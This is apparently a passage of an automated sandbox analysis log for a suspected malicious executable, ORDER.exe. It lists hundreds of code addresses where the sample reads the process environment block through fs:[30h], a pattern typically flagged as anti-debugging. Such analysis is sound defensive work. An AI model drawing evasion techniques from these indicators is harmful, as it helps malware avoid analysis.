      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242510D mov eax, dword ptr fs:[00000030h]3_2_3242510D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F113 mov eax, dword ptr fs:[00000030h]3_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32450118 mov eax, dword ptr fs:[00000030h]3_2_32450118
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32457128 mov eax, dword ptr fs:[00000030h]3_2_32457128
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32457128 mov eax, dword ptr fs:[00000030h]3_2_32457128
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DF13E mov eax, dword ptr fs:[00000030h]3_2_324DF13E
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324AA130 mov eax, dword ptr fs:[00000030h]3_2_324AA130
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324301C0 mov eax, dword ptr fs:[00000030h]3_2_324301C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324301C0 mov eax, dword ptr fs:[00000030h]3_2_324301C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324351C0 mov eax, dword ptr fs:[00000030h]3_2_324351C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324351C0 mov eax, dword ptr fs:[00000030h]3_2_324351C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324351C0 mov eax, dword ptr fs:[00000030h]3_2_324351C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324351C0 mov eax, dword ptr fs:[00000030h]3_2_324351C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242A1E3 mov eax, dword ptr fs:[00000030h]3_2_3242A1E3
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242A1E3 mov eax, dword ptr fs:[00000030h]3_2_3242A1E3
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242A1E3 mov eax, dword ptr fs:[00000030h]3_2_3242A1E3
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242A1E3 mov eax, dword ptr fs:[00000030h]3_2_3242A1E3
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242A1E3 mov eax, dword ptr fs:[00000030h]3_2_3242A1E3
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324291E5 mov eax, dword ptr fs:[00000030h]3_2_324291E5
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324291E5 mov eax, dword ptr fs:[00000030h]3_2_324291E5
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324181EB mov eax, dword ptr fs:[00000030h]3_2_324181EB
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324191F0 mov eax, dword ptr fs:[00000030h]3_2_324191F0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324191F0 mov eax, dword ptr fs:[00000030h]3_2_324191F0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324301F1 mov eax, dword ptr fs:[00000030h]3_2_324301F1
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324301F1 mov eax, dword ptr fs:[00000030h]3_2_324301F1
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324301F1 mov eax, dword ptr fs:[00000030h]3_2_324301F1
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244F1F0 mov eax, dword ptr fs:[00000030h]3_2_3244F1F0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244F1F0 mov eax, dword ptr fs:[00000030h]3_2_3244F1F0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32424180 mov eax, dword ptr fs:[00000030h]3_2_32424180
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32424180 mov eax, dword ptr fs:[00000030h]3_2_32424180
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32424180 mov eax, dword ptr fs:[00000030h]3_2_32424180
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32449194 mov eax, dword ptr fs:[00000030h]3_2_32449194
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32461190 mov eax, dword ptr fs:[00000030h]3_2_32461190
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32461190 mov eax, dword ptr fs:[00000030h]3_2_32461190
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E1A4 mov eax, dword ptr fs:[00000030h]3_2_3245E1A4
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E1A4 mov eax, dword ptr fs:[00000030h]3_2_3245E1A4
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F51B6 mov eax, dword ptr fs:[00000030h]3_2_324F51B6
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324531BE mov eax, dword ptr fs:[00000030h]3_2_324531BE
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324531BE mov eax, dword ptr fs:[00000030h]3_2_324531BE
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324541BB mov ecx, dword ptr fs:[00000030h]3_2_324541BB
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324541BB mov eax, dword ptr fs:[00000030h]3_2_324541BB
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324541BB mov eax, dword ptr fs:[00000030h]3_2_324541BB
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32423640 mov eax, dword ptr fs:[00000030h]3_2_32423640
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243F640 mov eax, dword ptr fs:[00000030h]3_2_3243F640
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243F640 mov eax, dword ptr fs:[00000030h]3_2_3243F640
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243F640 mov eax, dword ptr fs:[00000030h]3_2_3243F640
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245C640 mov eax, dword ptr fs:[00000030h]3_2_3245C640
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245C640 mov eax, dword ptr fs:[00000030h]3_2_3245C640
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241D64A mov eax, dword ptr fs:[00000030h]3_2_3241D64A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241D64A mov eax, dword ptr fs:[00000030h]3_2_3241D64A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32455654 mov eax, dword ptr fs:[00000030h]3_2_32455654
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243B650 mov ecx, dword ptr fs:[00000030h]3_2_3243B650
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243B650 mov eax, dword ptr fs:[00000030h]3_2_3243B650
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243B650 mov eax, dword ptr fs:[00000030h]3_2_3243B650
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243B650 mov eax, dword ptr fs:[00000030h]3_2_3243B650
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243B650 mov eax, dword ptr fs:[00000030h]3_2_3243B650
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245265C mov eax, dword ptr fs:[00000030h]3_2_3245265C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245265C mov ecx, dword ptr fs:[00000030h]3_2_3245265C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245265C mov eax, dword ptr fs:[00000030h]3_2_3245265C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32417662 mov eax, dword ptr fs:[00000030h]3_2_32417662
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32417662 mov eax, dword ptr fs:[00000030h]3_2_32417662
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32417662 mov eax, dword ptr fs:[00000030h]3_2_32417662
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A166E mov eax, dword ptr fs:[00000030h]3_2_324A166E
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A166E mov eax, dword ptr fs:[00000030h]3_2_324A166E
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A166E mov eax, dword ptr fs:[00000030h]3_2_324A166E
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245666D mov esi, dword ptr fs:[00000030h]3_2_3245666D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245666D mov eax, dword ptr fs:[00000030h]3_2_3245666D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245666D mov eax, dword ptr fs:[00000030h]3_2_3245666D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32420670 mov eax, dword ptr fs:[00000030h]3_2_32420670
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462670 mov eax, dword ptr fs:[00000030h]3_2_32462670
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462670 mov eax, dword ptr fs:[00000030h]3_2_32462670
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324B3608 mov eax, dword ptr fs:[00000030h]3_2_324B3608
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324B3608 mov eax, dword ptr fs:[00000030h]3_2_324B3608
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324B3608 mov eax, dword ptr fs:[00000030h]3_2_324B3608
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324B3608 mov eax, dword ptr fs:[00000030h]3_2_324B3608
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324B3608 mov eax, dword ptr fs:[00000030h]3_2_324B3608
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324B3608 mov eax, dword ptr fs:[00000030h]3_2_324B3608
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244D600 mov eax, dword ptr fs:[00000030h]3_2_3244D600
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244D600 mov eax, dword ptr fs:[00000030h]3_2_3244D600
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DF607 mov eax, dword ptr fs:[00000030h]3_2_324DF607
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245360F mov eax, dword ptr fs:[00000030h]3_2_3245360F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F4600 mov eax, dword ptr fs:[00000030h]3_2_324F4600
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CD62C mov ecx, dword ptr fs:[00000030h]3_2_324CD62C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CD62C mov ecx, dword ptr fs:[00000030h]3_2_324CD62C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CD62C mov eax, dword ptr fs:[00000030h]3_2_324CD62C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32425622 mov eax, dword ptr fs:[00000030h]3_2_32425622
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32425622 mov eax, dword ptr fs:[00000030h]3_2_32425622
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32427623 mov eax, dword ptr fs:[00000030h]3_2_32427623
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245C620 mov eax, dword ptr fs:[00000030h]3_2_3245C620
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32420630 mov eax, dword ptr fs:[00000030h]3_2_32420630
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32450630 mov eax, dword ptr fs:[00000030h]3_2_32450630
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A8633 mov esi, dword ptr fs:[00000030h]3_2_324A8633
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A8633 mov eax, dword ptr fs:[00000030h]3_2_324A8633
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A8633 mov eax, dword ptr fs:[00000030h]3_2_324A8633
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245F63F mov eax, dword ptr fs:[00000030h]3_2_3245F63F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245F63F mov eax, dword ptr fs:[00000030h]3_2_3245F63F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324206CF mov eax, dword ptr fs:[00000030h]3_2_324206CF
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324EA6C0 mov eax, dword ptr fs:[00000030h]3_2_324EA6C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244D6D0 mov eax, dword ptr fs:[00000030h]3_2_3244D6D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324196E0 mov eax, dword ptr fs:[00000030h]3_2_324196E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324196E0 mov eax, dword ptr fs:[00000030h]3_2_324196E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242C6E0 mov eax, dword ptr fs:[00000030h]3_2_3242C6E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324256E0 mov eax, dword ptr fs:[00000030h]3_2_324256E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324256E0 mov eax, dword ptr fs:[00000030h]3_2_324256E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324256E0 mov eax, dword ptr fs:[00000030h]3_2_324256E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324466E0 mov eax, dword ptr fs:[00000030h]3_2_324466E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324466E0 mov eax, dword ptr fs:[00000030h]3_2_324466E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249C6F2 mov eax, dword ptr fs:[00000030h]3_2_3249C6F2
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249C6F2 mov eax, dword ptr fs:[00000030h]3_2_3249C6F2
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DF68C mov eax, dword ptr fs:[00000030h]3_2_324DF68C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430680 mov eax, dword ptr fs:[00000030h]3_2_32430680
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430680 mov eax, dword ptr fs:[00000030h]3_2_32430680
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430680 mov eax, dword ptr fs:[00000030h]3_2_32430680
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430680 mov eax, dword ptr fs:[00000030h]3_2_32430680
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430680 mov eax, dword ptr fs:[00000030h]3_2_32430680
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430680 mov eax, dword ptr fs:[00000030h]3_2_32430680
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430680 mov eax, dword ptr fs:[00000030h]3_2_32430680
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430680 mov eax, dword ptr fs:[00000030h]3_2_32430680
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430680 mov eax, dword ptr fs:[00000030h]3_2_32430680
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430680 mov eax, dword ptr fs:[00000030h]3_2_32430680
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430680 mov eax, dword ptr fs:[00000030h]3_2_32430680
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430680 mov eax, dword ptr fs:[00000030h]3_2_32430680
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32428690 mov eax, dword ptr fs:[00000030h]3_2_32428690
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249D69D mov eax, dword ptr fs:[00000030h]3_2_3249D69D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324E86A8 mov eax, dword ptr fs:[00000030h]3_2_324E86A8
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324E86A8 mov eax, dword ptr fs:[00000030h]3_2_324E86A8
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A174B mov eax, dword ptr fs:[00000030h]3_2_324A174B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A174B mov ecx, dword ptr fs:[00000030h]3_2_324A174B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32453740 mov eax, dword ptr fs:[00000030h]3_2_32453740
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245174A mov eax, dword ptr fs:[00000030h]3_2_3245174A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245A750 mov eax, dword ptr fs:[00000030h]3_2_3245A750
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F75B mov eax, dword ptr fs:[00000030h]3_2_3241F75B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F75B mov eax, dword ptr fs:[00000030h]3_2_3241F75B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F75B mov eax, dword ptr fs:[00000030h]3_2_3241F75B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F75B mov eax, dword ptr fs:[00000030h]3_2_3241F75B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F75B mov eax, dword ptr fs:[00000030h]3_2_3241F75B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F75B mov eax, dword ptr fs:[00000030h]3_2_3241F75B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F75B mov eax, dword ptr fs:[00000030h]3_2_3241F75B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F75B mov eax, dword ptr fs:[00000030h]3_2_3241F75B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F75B mov eax, dword ptr fs:[00000030h]3_2_3241F75B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CE750 mov eax, dword ptr fs:[00000030h]3_2_324CE750
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32432760 mov ecx, dword ptr fs:[00000030h]3_2_32432760
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32461763 mov eax, dword ptr fs:[00000030h]3_2_32461763
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32461763 mov eax, dword ptr fs:[00000030h]3_2_32461763
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32461763 mov eax, dword ptr fs:[00000030h]3_2_32461763
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32461763 mov eax, dword ptr fs:[00000030h]3_2_32461763
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32461763 mov eax, dword ptr fs:[00000030h]3_2_32461763
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32461763 mov eax, dword ptr fs:[00000030h]3_2_32461763
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32450774 mov eax, dword ptr fs:[00000030h]3_2_32450774
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32424779 mov eax, dword ptr fs:[00000030h]3_2_32424779
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32424779 mov eax, dword ptr fs:[00000030h]3_2_32424779
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242D700 mov ecx, dword ptr fs:[00000030h]3_2_3242D700
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241B705 mov eax, dword ptr fs:[00000030h]3_2_3241B705
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241B705 mov eax, dword ptr fs:[00000030h]3_2_3241B705
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241B705 mov eax, dword ptr fs:[00000030h]3_2_3241B705
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241B705 mov eax, dword ptr fs:[00000030h]3_2_3241B705
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324E970B mov eax, dword ptr fs:[00000030h]3_2_324E970B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324E970B mov eax, dword ptr fs:[00000030h]3_2_324E970B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242170C mov eax, dword ptr fs:[00000030h]3_2_3242170C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242170C mov eax, dword ptr fs:[00000030h]3_2_3242170C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242170C mov eax, dword ptr fs:[00000030h]3_2_3242170C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242471B mov eax, dword ptr fs:[00000030h]3_2_3242471B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242471B mov eax, dword ptr fs:[00000030h]3_2_3242471B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DF717 mov eax, dword ptr fs:[00000030h]3_2_324DF717
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32423722 mov eax, dword ptr fs:[00000030h]3_2_32423722
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32423722 mov eax, dword ptr fs:[00000030h]3_2_32423722
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DF7CF mov eax, dword ptr fs:[00000030h]3_2_324DF7CF
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244E7E0 mov eax, dword ptr fs:[00000030h]3_2_3244E7E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324237E4 mov eax, dword ptr fs:[00000030h]3_2_324237E4
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324237E4 mov eax, dword ptr fs:[00000030h]3_2_324237E4
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324237E4 mov eax, dword ptr fs:[00000030h]3_2_324237E4
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324237E4 mov eax, dword ptr fs:[00000030h]3_2_324237E4
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324237E4 mov eax, dword ptr fs:[00000030h]3_2_324237E4
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324237E4 mov eax, dword ptr fs:[00000030h]3_2_324237E4
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324237E4 mov eax, dword ptr fs:[00000030h]3_2_324237E4
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324277F9 mov eax, dword ptr fs:[00000030h]3_2_324277F9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324277F9 mov eax, dword ptr fs:[00000030h]3_2_324277F9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324FB781 mov eax, dword ptr fs:[00000030h]3_2_324FB781
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324FB781 mov eax, dword ptr fs:[00000030h]3_2_324FB781
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32451796 mov eax, dword ptr fs:[00000030h]3_2_32451796
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32451796 mov eax, dword ptr fs:[00000030h]3_2_32451796
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249E79D mov eax, dword ptr fs:[00000030h]3_2_3249E79D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249E79D mov eax, dword ptr fs:[00000030h]3_2_3249E79D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249E79D mov eax, dword ptr fs:[00000030h]3_2_3249E79D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249E79D mov eax, dword ptr fs:[00000030h]3_2_3249E79D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249E79D mov eax, dword ptr fs:[00000030h]3_2_3249E79D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249E79D mov eax, dword ptr fs:[00000030h]3_2_3249E79D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249E79D mov eax, dword ptr fs:[00000030h]3_2_3249E79D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249E79D mov eax, dword ptr fs:[00000030h]3_2_3249E79D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249E79D mov eax, dword ptr fs:[00000030h]3_2_3249E79D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324207A7 mov eax, dword ptr fs:[00000030h]3_2_324207A7
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324ED7A7 mov eax, dword ptr fs:[00000030h]3_2_324ED7A7
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324ED7A7 mov eax, dword ptr fs:[00000030h]3_2_324ED7A7
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324ED7A7 mov eax, dword ptr fs:[00000030h]3_2_324ED7A7
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F17BC mov eax, dword ptr fs:[00000030h]3_2_324F17BC
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430445 mov eax, dword ptr fs:[00000030h]3_2_32430445
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430445 mov eax, dword ptr fs:[00000030h]3_2_32430445
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430445 mov eax, dword ptr fs:[00000030h]3_2_32430445
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430445 mov eax, dword ptr fs:[00000030h]3_2_32430445
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430445 mov eax, dword ptr fs:[00000030h]3_2_32430445
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430445 mov eax, dword ptr fs:[00000030h]3_2_32430445
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A0443 mov eax, dword ptr fs:[00000030h]3_2_324A0443
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245D450 mov eax, dword ptr fs:[00000030h]3_2_3245D450
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245D450 mov eax, dword ptr fs:[00000030h]3_2_3245D450
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242D454 mov eax, dword ptr fs:[00000030h]3_2_3242D454
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242D454 mov eax, dword ptr fs:[00000030h]3_2_3242D454
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242D454 mov eax, dword ptr fs:[00000030h]3_2_3242D454
